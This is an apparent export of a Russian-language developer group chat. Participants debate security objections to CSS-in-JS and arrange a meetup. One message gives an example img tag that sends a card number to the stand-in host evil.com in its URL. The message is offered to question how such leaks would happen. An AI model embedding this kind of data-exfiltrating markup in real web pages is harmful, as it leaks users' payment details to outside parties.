Ф
и если в твоей супер пупер библиотеке нне будет нужной мне возможности, то я вынужден буду создать свою библиотеку
Size: a a a
2020 November 26
AS
можно поковоркать антаппд
го, у меня подгон есть босяцкий
IK
Какая-то странная война против CSS-in-JS, если честно. Аргументы валидные, просто как-то совсем огульно применяются. Реакт тоже позволяет ХМТЛ вставлять, значит всем надо выкидывать Реакт. А Полимер такого не позволяет, поэтому надо всем писать веб-компоненты
IK
Ну, то есть я вижу проблему, но не понимаю, почему это отменяет вообще всё
IK
Как-то, вон, и на Джаваскрипте научились писать приложения, хотя там мест где можно не только ногу отстрелить, но и яйца впридачу, на каждом шагу
AM
я не понял изначальной уязвимости, допустим в css попадет персональная инфа, как она дальше утечет? и почему css properties не подвержены такой проблемы, там тоже можно вставить произвольный CSS
AM
кажется если нужно покрывать аткие кейсы, то нужно написать враппер по верх и все. Типа билдеры стилей и только так делать динамику
AM
я не понял изначальной уязвимости, допустим в css попадет персональная инфа, как она дальше утечет? и почему css properties не подвержены такой проблемы, там тоже можно вставить произвольный CSS
+ кто разработчику запретит сделать style у дива и туда зафигачить паспортные данные + номер карты
AM
или <img src=
https://evil.com/cat.jpg?additioninfo=cardnumber-431323131321 />SR
го, у меня подгон есть босяцкий
го сегодня
AS
го сегодня
сегодня же board js
SR
а, тут и холи ж задержался
SR
тока в 22+ закончтися
AS
го завтра, я часов с 17-18 свободен буду
а если поработать выйдет, то и с 14
а если поработать выйдет, то и с 14
SR
SR
ДП
AK
Когда в доме не чистят серебро
AK
Бэм!